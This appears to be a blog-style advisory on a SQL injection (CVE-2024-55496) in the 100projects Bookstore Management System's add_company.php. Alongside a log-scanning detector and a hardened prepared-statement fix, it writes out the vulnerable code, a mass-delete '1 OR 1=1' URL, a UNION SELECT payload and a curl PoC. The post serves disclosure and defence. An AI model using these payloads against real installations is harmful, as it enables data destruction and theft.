A new vulnerability, tracked as CVE-2024-55496, has been discovered in the 100projects Bookstore Management System PHP MySQL Project 1. It allows attackers to perform SQL injection, one of the most common and dangerous web application exploits. The issue is in the add_company.php file, where the delete parameter is handled unsafely.
In this post, we’ll break down how the vulnerability works, how a simple attack can be performed, and how you can protect your application if you’re using this project.
What is SQL Injection?
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries your application makes to its database. It typically allows attackers to view data they aren’t supposed to see, but can also be used to delete data, change database content, and in some cases, even take over the server.
Vulnerable Functionality: add_company.php
The vulnerable script, add_company.php, takes user input through the delete parameter and uses it directly in a SQL query, without proper validation or sanitization. This failure allows attackers to inject malicious SQL code by manipulating the request.
Example of Vulnerable PHP Code
// add_company.php (vulnerable version)
if (isset($_REQUEST['delete'])) {
    $delete_id = $_REQUEST['delete'];                      // raw, unvalidated input (GET, POST or cookie)
    $query = "DELETE FROM company WHERE id = $delete_id";  // interpolated straight into the SQL string
    mysqli_query($conn, $query);
}
If the attacker sends a request like:
http://your-bookstore.com/add_company.php?delete=1 OR 1=1
the SQL query becomes:
DELETE FROM company WHERE id = 1 OR 1=1
Because OR 1=1 is always true, the WHERE clause matches every row and the query deletes EVERY row in the company table. Depending on the payload, attackers can also read sensitive data or escalate the attack further if database error messages are shown to the user.
More advanced attack
Suppose an attacker wants to extract data. In an error-based injection scenario, they could send something like:
http://your-bookstore.com/add_company.php?delete=1 UNION SELECT 1, version() --
If the application displays database errors or query output, the attacker can learn the MySQL version and the database structure.
Here's a simple PoC curl command to exploit the vulnerability:
curl "http://your-bookstore.com/add_company.php?delete= OR 1=1"
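On the detection side, the requests above leave a clear trace in the web-server access log: the legitimate UI only ever sends a plain positive integer in delete, so anything else is worth an alert. The following PHP command-line script is an added example (not part of the original post or the 100projects code); the file name, the combined-log format and the sample log lines are all constructed for it.

```php
<?php
// detect_delete_injection.php (hypothetical file name, added example): scan
// access-log lines for add_company.php requests whose `delete` parameter is
// not a plain positive integer.

/**
 * Return the URL-decoded `delete` value from one log line, or null when the
 * line is not a request for add_company.php that carries that parameter.
 */
function extractDeleteParam(string $logLine): ?string
{
    // Apache/nginx combined format: "METHOD /path?query HTTP/x.y"
    if (!preg_match('/"(?:GET|POST)\s+(\S+)\s+HTTP\/[\d.]+"/', $logLine, $m)) {
        return null;
    }
    $path  = parse_url($m[1], PHP_URL_PATH);
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($path) || !is_string($query) || basename($path) !== 'add_company.php') {
        return null;
    }
    parse_str($query, $params);   // parse_str also URL-decodes the values
    if (!isset($params['delete'])) {
        return null;
    }
    // delete[]=... would arrive as an array; treat that as an empty (and therefore
    // suspicious) value rather than crashing on a cast.
    return is_string($params['delete']) ? $params['delete'] : '';
}

/** A legitimate delete id is a positive integer and nothing else. */
function isSuspiciousDeleteValue(string $value): bool
{
    return preg_match('/^[1-9][0-9]*$/', $value) !== 1;
}

/** Return the log lines (with the offending value) that fail the check. */
function findSuspiciousRequests(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $value = extractDeleteParam($line);
        if ($value !== null && isSuspiciousDeleteValue($value)) {
            $hits[] = ['line' => $line, 'delete' => $value];
        }
    }
    return $hits;
}

// Constructed sample log lines (not real traffic). The second and third carry
// the payloads discussed in the post, URL-encoded as a browser or curl would send them.
$sampleLog = [
    '10.0.0.5 - - [17/Dec/2024:18:20:01 +0000] "GET /add_company.php?delete=7 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [17/Dec/2024:18:20:05 +0000] "GET /add_company.php?delete=1%20OR%201%3D1 HTTP/1.1" 200 512 "-" "curl/8.0"',
    '10.0.0.9 - - [17/Dec/2024:18:20:09 +0000] "GET /add_company.php?delete=1%20UNION%20SELECT%201,version()%20-- HTTP/1.1" 500 0 "-" "curl/8.0"',
    '10.0.0.5 - - [17/Dec/2024:18:21:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
];

foreach (findSuspiciousRequests($sampleLog) as $hit) {
    printf("SUSPICIOUS delete=%s\n  %s\n", $hit['delete'], $hit['line']);
}
```

Run it as `php detect_delete_injection.php`; with the constructed lines it reports the second and third requests and stays quiet on the legitimate id and on the unrelated index.php hit. The same allow-list check (positive integer only) is what the fixed add_company.php should enforce server-side, so the log rule and the code fix agree on what "normal" looks like.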
Mitigation
To fix this issue, never insert user input directly into SQL queries. Always use prepared statements or at least cast and escape your variables.
Secure PHP Example Using Prepared Statements
// add_company.php (fixed version)
if (isset($_REQUEST['delete'])) {
    $delete_id = intval($_REQUEST['delete']);   // coerce to an integer; non-numeric input becomes 0
    $stmt = mysqli_prepare($conn, "DELETE FROM company WHERE id = ?");
    mysqli_stmt_bind_param($stmt, "i", $delete_id);   // bound as an integer parameter, never interpolated
    mysqli_stmt_execute($stmt);
}
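Building on that snippet, here is a fuller hardened version of the delete branch, added here as an example rather than taken from the project. Beyond the prepared statement it restricts the action to POST, checks a CSRF token, rejects anything that is not a positive integer before it reaches the database (intval() alone would quietly turn "1 OR 1=1" into 1 and delete company 1), checks how many rows were actually removed, and sends database errors to the server log instead of the browser. It assumes $conn is an open mysqli connection, that session_start() has already run, and that the page that renders the delete button stored a token in $_SESSION['csrf'] and submits it as the csrf form field; those names are assumptions, not the project's.

```php
<?php
// add_company.php, delete branch only (hardened; added example, not the
// project's own code). Assumes: $conn is an open mysqli connection,
// session_start() has run, and $_SESSION['csrf'] / $_POST['csrf'] carry the
// anti-CSRF token (hypothetical names).

/**
 * Validate the raw `delete` parameter: only a positive integer is acceptable.
 * Returns the id or null. Unlike intval(), this rejects "1 OR 1=1" outright
 * instead of silently turning it into 1.
 */
function parseDeleteId($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Delete one company row by id with a prepared statement.
 * Returns the number of rows deleted (0 if no such id); throws on a DB error.
 */
function deleteCompany(mysqli $conn, int $id): int
{
    $stmt = mysqli_prepare($conn, 'DELETE FROM company WHERE id = ? LIMIT 1');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . mysqli_error($conn));
    }
    mysqli_stmt_bind_param($stmt, 'i', $id);   // integer parameter, never part of the SQL text
    if (!mysqli_stmt_execute($stmt)) {
        $err = mysqli_stmt_error($stmt);
        mysqli_stmt_close($stmt);
        throw new RuntimeException('execute failed: ' . $err);
    }
    $deleted = (int) mysqli_stmt_affected_rows($stmt);
    mysqli_stmt_close($stmt);
    return $deleted;
}

// State-changing actions are accepted via POST only, and read from $_POST rather
// than $_REQUEST so that a crafted GET link or cookie cannot supply the parameter.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['delete'])) {
    $token = $_POST['csrf'] ?? '';
    if (!is_string($token) || empty($_SESSION['csrf']) || !hash_equals($_SESSION['csrf'], $token)) {
        http_response_code(403);
        exit('Invalid request token');
    }

    $id = parseDeleteId($_POST['delete']);
    if ($id === null) {
        // Record the rejection server-side; never echo the input or a SQL error back.
        error_log('add_company.php: rejected delete id from ' . $_SERVER['REMOTE_ADDR']);
        http_response_code(400);
        exit('Invalid company id');
    }

    try {
        $deleted = deleteCompany($conn, $id);
    } catch (RuntimeException $e) {
        error_log('add_company.php: ' . $e->getMessage());
        http_response_code(500);
        exit('Could not delete company');
    }

    // $deleted is 0 when the id did not exist, 1 when exactly one row was removed.
    header('Location: add_company.php?deleted=' . $deleted);
    exit;
}
```

The LIMIT 1 is belt-and-braces: with the id bound as an integer the statement can only ever match one primary-key row, but the clause makes the intent explicit and caps the damage if the column is ever changed to something non-unique. The error_log() call is also what feeds the detection rule from the earlier section: repeated rejections from one address are a cheap, reliable signal that someone is probing the parameter.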
References
- Original Project Source
- MITRE CVE Directory (CVE-2024-55496) (To be published)
- OWASP: SQL Injection
Conclusion
CVE-2024-55496 is a critical and easy-to-exploit vulnerability in the 100projects Bookstore Management PHP Project 1. Anybody running this software in production should patch it immediately by using prepared statements and validating input. Left unpatched, it lets anyone delete or manipulate company records, and possibly do much worse.
If you're running this or similar legacy PHP apps, check your code! Today’s simple mistake can be tomorrow’s disaster. Stay safe and keep your code secure.
Timeline
Published on: 12/17/2024 18:15:25 UTC
Last modified on: 12/20/2024 21:15:09 UTC